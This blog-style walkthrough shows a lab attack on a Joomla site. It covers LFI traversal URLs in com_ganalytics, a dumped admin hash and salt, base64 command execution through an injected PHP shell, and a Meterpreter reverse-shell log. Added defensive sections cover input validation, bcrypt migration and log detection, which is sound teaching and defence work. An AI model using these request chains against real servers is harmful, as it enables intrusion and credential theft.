2010/10/21

New method and style: hacking a Windows server using LFI and a new type of backdoor (.exe)



Local File Inclusion attacks are among the most common vulnerabilities seen against web applications. Because they’re thought to be relatively benign, most organizations dismiss the large security risk they potentially create. In this paper I’ll present an attack against a site where the only known vulnerability is a web application that’s vulnerable to Local File Inclusion.

The host is a Windows system running XAMP to supply Apache, MySQL and PHP. The site is running the Joomla! web application and has a single vulnerable plugin installed: com_ganalytics. This is the Google Analytics plugin used by Joomla site operators to track site usage.

The vulnerable piece of code that makes LFI possible is found in the ganalytics.php file. It’s the following:

if ($controller = JRequest::getVar('controller')) {
    require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
}

The 'controller' parameter is spliced into the include path without any validation. This small mistake allows an attacker to traverse the entire file system.
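As a defensive counterpart, here is a hardened replacement for that include. This is an added example, not code from the original post or from the com_ganalytics plugin; plain variables stand in for JPATH_COMPONENT and JRequest, and the script creates its own temporary controllers directory so it runs stand-alone. It combines three independent checks: an identifier shape check, an allow-list built from the files that actually exist, and a realpath() containment check. The %00 at the end of the requests shown in this write-up matters because, on PHP versions before 5.3.4, a null byte truncates the path so the appended '.php' suffix is never reached; the shape check rejects it regardless of PHP version.

```php
<?php
// Added example (not the com_ganalytics plugin's code). Stand-alone: it builds a
// temporary "controllers" directory holding one legitimate controller, then
// shows a hardened replacement for
//     require_once(JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
// JPATH_COMPONENT and JRequest are replaced by plain variables.

$componentDir   = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
$controllersDir = $componentDir . '/controllers';
mkdir($controllersDir, 0700, true);
file_put_contents($controllersDir . '/ganalytics.php',
    "<?php\nreturn 'ganalytics controller loaded';\n");

/**
 * Returns the absolute path of the controller to include, or null when the
 * requested value is rejected.
 */
function resolveController(string $controllersDir, string $controller): ?string
{
    // 1. Shape check: controller names are plain identifiers. This alone
    //    rejects "..", "/" and "\", and the null byte that %00 decodes to.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $controller)) {
        return null;
    }

    // 2. Allow-list: only names of files that really exist in the controllers
    //    directory are acceptable, so nothing outside it can match.
    $allowed = array_map(
        fn($file) => basename($file, '.php'),
        glob($controllersDir . '/*.php') ?: []
    );
    if (!in_array($controller, $allowed, true)) {
        return null;
    }

    // 3. Containment check on the resolved real path, so that symlinks or a
    //    later relaxation of rule 1 still cannot escape the directory.
    $base = realpath($controllersDir);
    $path = realpath($controllersDir . '/' . $controller . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs mirroring the request parameters seen in this write-up.
$inputs = [
    'ganalytics',                                    // legitimate controller
    "..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\0",   // traversal plus null byte
    '../../../../../../etc/passwd',                  // forward-slash traversal
    'nonexistent',                                   // valid shape, not a controller
];
foreach ($inputs as $value) {
    $resolved = resolveController($controllersDir, $value);
    printf("%-44s => %s\n", addcslashes($value, "\0"),
        $resolved === null ? 'REJECTED' : 'include ' . basename($resolved));
    if ($resolved !== null) {
        $result = require_once $resolved;
        echo "    ", $result, "\n";
    }
}

// Remove the temporary fixture.
unlink($controllersDir . '/ganalytics.php');
rmdir($controllersDir);
rmdir($componentDir);
```

Only the first input is included; the other three are rejected before any file system access. Joomla's own JRequest::getCmd() accessor applies the framework's CMD filter, which strips path separators and null bytes, so using it instead of getVar() would already have blocked the requests in this post; the allow-list and containment checks are still worth keeping because they do not depend on the filter's character set.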

I was able to use this code in the following manner to read files on the local machine.

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\boot.ini%00

This returned the following in my browser…

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

Nice…

After a bit of research about the Joomla database layout, I learned that the jos_users table is the one that contains the user information. Everything from the password hashes and salts to user email addresses are kept in that table.

Using the same directory traversal used earlier, we’ll attempt to read the MySQL data file containing user credentials using the following:

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00

with the following result…

þ>��� Administrator admin administrator@localhost-db.comA115def1b208327f20d85b65aa7dc2440:UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I Super Administrator 9²þG ��ìnH H ���m�admin_language=language= editor= helpsite= timezone=0 ��

The important part of the above output is the Joomla site administrator's password hash and salt, separated by a colon.

hash=115def1b208327f20d85b65aa7dc2440
salt=UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I

After a bit of research on the Joomla forum (http://forum.joomla.org/viewtopic.php?f=432&t=207689) we learn how the Joomla password is calculated.

It is an MD5 digest of the cleartext password concatenated with the salt, i.e. md5(password + salt).

With this knowledge, the easiest way into the administrative interface is probably to brute-force the administrator password.
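The scheme above, and what a site owner should do about it once a jos_users dump is suspected, as an added example (not Joomla's own code): a verifier that accepts the legacy "md5(password . salt):salt" value, and on a successful match returns a bcrypt replacement from password_hash() to write back into the table. The password and salt are constructed for the demo, not the values from the dump.

```php
<?php
// Added example, not Joomla's own code. Demonstrates the legacy Joomla 1.5
// credential format described above and a verify-then-upgrade path to bcrypt.
// Password and salt are constructed; they are not the values from the dump.

function legacyJoomlaStore(string $password, string $salt): string
{
    // The stored column value is "md5(password . salt):salt".
    return md5($password . $salt) . ':' . $salt;
}

/**
 * Checks $password against $stored in either format. On a legacy match,
 * $upgraded receives the bcrypt value that should replace it in jos_users.
 */
function verifyAndUpgrade(string $password, string $stored, ?string &$upgraded): bool
{
    $upgraded = null;
    if (strpos($stored, ':') === false) {
        // Already migrated: a bcrypt hash produced by password_hash().
        return password_verify($password, $stored);
    }
    [$hash, $salt] = explode(':', $stored, 2);
    // hash_equals() compares in constant time, unlike == or ===.
    if (!hash_equals($hash, md5($password . $salt))) {
        return false;
    }
    // Legacy scheme matched: re-hash with bcrypt so a future table dump cannot
    // be attacked at md5 speed. Cost 12 is a reasonable 2020s default.
    $upgraded = password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
    return true;
}

$salt   = bin2hex(random_bytes(16));                 // constructed 32-character salt
$stored = legacyJoomlaStore('correct horse battery', $salt);

$ok = verifyAndUpgrade('wrong password', $stored, $upgraded);
printf("wrong password against legacy value: %s\n", $ok ? 'accepted' : 'rejected');

$ok = verifyAndUpgrade('correct horse battery', $stored, $upgraded);
printf("right password against legacy value: %s\n", $ok ? 'accepted' : 'rejected');
printf("replacement to store: %s\n", $upgraded);

// The replacement has no colon, so it takes the bcrypt branch next time.
$ok = verifyAndUpgrade('correct horse battery', $upgraded, $unused);
printf("right password against bcrypt value: %s\n", $ok ? 'accepted' : 'rejected');
```

The reason the upgrade matters is the one the write-up relies on: MD5 is designed to be fast, so a leaked hash:salt pair can be guessed at very high speed offline, whereas bcrypt's cost parameter makes each guess deliberately slow and can be raised as hardware improves.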

We navigate to the administrator account settings page and look for a field where we can inject the following PHP code, which would allow us to execute commands on the local system.



We use the Tamper Data Firefox plugin to inject the PHP base64 decode shell into the ‘language’ field.

At this point we have the ability to run commands on the system. The process involves the following:

* base64-encoding our command
* injecting the base64-encoded text into the 'cmd' parameter
* running the command by calling the base64-decoder shell that we injected into the database.

So let's give it a shot. We'll base64-encode the "dir" command:

http://localhost/joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD

with the following result:

(sorry hidden for Privacy)


Nice. The next step is to get something a bit more ‘potent’ on the system so that we get shell access.

We’re going to make use of PHP’s $_FILES variable to create a file uploader that we can use to put our payload on the local file system.

root@bt:~/ctp/traversal/joomla# cat upload.php
<?php
// Builds the base64-encoded command that writes the uploader into d.php.
// The uploader script echoed into d.php is not reproduced in this post.
$upload = "echo \"\" > d.php";
$output = base64_encode($upload);
echo $output;
?>

OK, now we try to pop the shell.

root@bt:~/ctp/traversal/joomla# echo shell.exe | base64
c2hlbGwuZXhlCg==
root@bt:~/ctp/traversal/joomla#

http://localhost/joomla/index.php?option=com_ganalytics&cmd=c2hlbGwuZXhlCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00
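From the defender's side, every request in this chain leaves a recognisable trace in the web server's access log: traversal sequences, a %00, a parameter naming a raw database or system file, and later a base64-looking 'cmd' parameter. The following is an added example, not part of the original post: a small detector for those patterns, run over constructed Apache combined-format log lines (the IPs, timestamps and paths are made up to mirror the requests above). It goes slightly beyond the write-up by also catching double-encoded traversal (%252e%252e%255c), which a single URL-decode would miss.

```php
<?php
// Added example, not from the original post. Detects the request patterns
// used in this write-up in Apache combined-format access-log lines.
// All log lines below are constructed for the demo.

$logLines = [
    '172.16.77.236 - - [21/Oct/2010:10:01:02 +0000] "GET /joomla/index.php?option=com_ganalytics&controller=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini%00 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '172.16.77.236 - - [21/Oct/2010:10:02:15 +0000] "GET /joomla/index.php?option=com_ganalytics&controller=..%5C..%5C..%5Cxamp%5Cmysql%5Cdata%5Cjoomla%5Cjos_users.MYD%00 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '172.16.77.236 - - [21/Oct/2010:10:05:40 +0000] "GET /joomla/index.php?option=com_ganalytics&cmd=ZGlyCg%3D%3D&controller=..%5C..%5Cxamp%5Cmysql%5Cdata%5Cjoomla%5Cjos_users.MYD HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '172.16.77.236 - - [21/Oct/2010:10:06:30 +0000] "GET /joomla/index.php?option=com_ganalytics&controller=%252e%252e%255c%252e%252e%255cboot.ini HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [21/Oct/2010:10:07:00 +0000] "GET /joomla/index.php?option=com_ganalytics&controller=ganalytics HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [21/Oct/2010:10:08:00 +0000] "GET /joomla/index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
];

/**
 * Returns the list of findings for one log line; an empty array means clean.
 */
function inspectLogLine(string $line): array
{
    // Pull the request target out of the quoted request field.
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];
    }
    // parse_str percent-decodes once: %5C becomes "\" and %00 becomes "\0".
    parse_str($query, $params);

    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        // A second decode exposes double-encoded payloads (%252e -> %2e -> .).
        $decoded = rawurldecode($value);
        if (preg_match('#\.\.[\\\\/]#', $decoded)) {
            $findings[] = "traversal in '$name'";
        }
        if (strpos($decoded, "\0") !== false) {
            $findings[] = "null byte in '$name'";
        }
        // Parameter naming a raw MySQL table file or a system config file.
        if (preg_match('/\.(MYD|MYI|frm|ini)$/i', rtrim($decoded, "\0"))) {
            $findings[] = "sensitive file reference in '$name'";
        }
    }
    // A valid-base64 'cmd' parameter is the command-execution pattern above.
    if (isset($params['cmd']) && is_string($params['cmd'])
        && preg_match('#^[A-Za-z0-9+/]+={0,2}$#', $params['cmd'])
        && ($cmd = base64_decode($params['cmd'], true)) !== false) {
        $shown = preg_replace('/[^\x20-\x7e]/', '?', trim($cmd));
        $findings[] = "base64 'cmd' parameter (decodes to \"$shown\")";
    }
    return $findings;
}

foreach ($logLines as $line) {
    $findings = inspectLogLine($line);
    $ip = strtok($line, ' ');
    printf("%-14s %s\n", $ip,
        $findings ? 'ALERT: ' . implode('; ', $findings) : 'ok');
}
```

The first four lines raise alerts and the last two are reported clean. Two further points from the session output later in this post are worth acting on independently of detection: getuid reports the web server running as JOOMLA\Administrator, so the LFI inherited full privileges, and the MySQL data directory was readable by that same account. A web server running as a low-privilege user, with the database files unreadable to it, would have stopped the jos_users.MYD read even with the include bug still present.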


Meanwhile on the attacking machine…

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.77.236:443
[*] Starting the payload handler…
[*] Sending stage (748032 bytes) to 172.16.77.246
[*] Meterpreter session 2 opened (172.16.77.236:443 -> 172.16.77.246:1682)

meterpreter > getuid
Server username: JOOMLA\Administrator
meterpreter > shell
Process 2640 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xamp\htdocs\joomla>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : example.com
IP Address. . . . . . . . . . . . : 172.16.77.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.8

C:\xamp\htdocs>

Game Over..!!!


At this point an attacker can use this machine as a pivot to attack other machines within the network, install trojans, place rogue code on the web server, etc. The only limit is how creative they are. So the next time you run that vulnerability scanner against your web application farm, don't be so quick to dismiss the potential damage of the RFI/LFI results.
